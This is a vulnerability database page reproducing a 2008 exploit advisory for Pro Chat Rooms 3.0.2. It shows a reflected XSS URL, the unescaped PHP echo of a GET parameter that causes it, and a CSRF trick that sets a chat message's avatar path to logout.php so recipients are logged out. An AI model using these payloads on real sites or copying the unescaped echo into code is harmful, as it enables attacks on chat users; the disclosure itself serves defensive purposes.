Vulners
Lucene search
Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities
#########################################################################
Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties
#########################################################################
## AUTHOR : ZynbER
## MAiL : ZynbER[at]Gmail[dot]com
## HOME : NoWhere
## Script WebSite : http://www.prochatrooms.com
## Version : Pro Chat Rooms Version 3.0.2
## EXPLOITS :
-==XSS==-
http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED
Vulnerable code in "/profiles/index.php"
<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>
-==CSRF==-
When a user sends a message in public room or in pm to onther user ; there is a parameter
to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message
The JS sending function; here u can see all params needed to POST a message to user/room
//Add a message to the chat server.
function sendChatText() {
if(!document.getElementById('txt_message').value) {
alert("You have not entered a message ");
return;
}
if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {
alert("You cannot whisper to yourself! ");
return;
}
if (sendReq.readyState == 4 || sendReq.readyState == 0) {
sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);
sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
sendReq.onreadystatechange = handleSendChat;
var param = 'message=' + document.getElementById('txt_message').value;
param += '&name=' + chat_user;
param += '&nid=' + chat_userid;
param += '&chat=1';
param += '&room=' + room;
param += '&whisper=' + document.getElementById('whisper').value;
param += '&fontface=' + document.getElementById('font_face').value;
param += '&fontcolor=' + document.getElementById('font_color').value;
param += '&fontheight=' + document.getElementById('font_height').value;
param += '&fontstyle=' + document.getElementById('font_style').value;
param += '&avatar=' + document.getElementById('user_avatar').value;
sendReq.send(param);
document.getElementById('txt_message').value = '';
}
}
Exploit Example:
default ==> http://www.yoursite.com/[path]/Avatars/online.gif
Your mallecious CSRF param; avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php
in this example the user will logout when he recieves ur message; in a public room all users will
be loged out from the room ;)
## Note:
This infos are for educational purpose only;
I'm not responsable for any damage caused...
## GREETZ : Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka
-=== Marequin est fière de l'être ===-
#########################################################################
Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties
#########################################################################
# milw0rm.com [2008-12-10]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Dec 2008 00:00Current
7.1High risk
Vulners AI Score7.1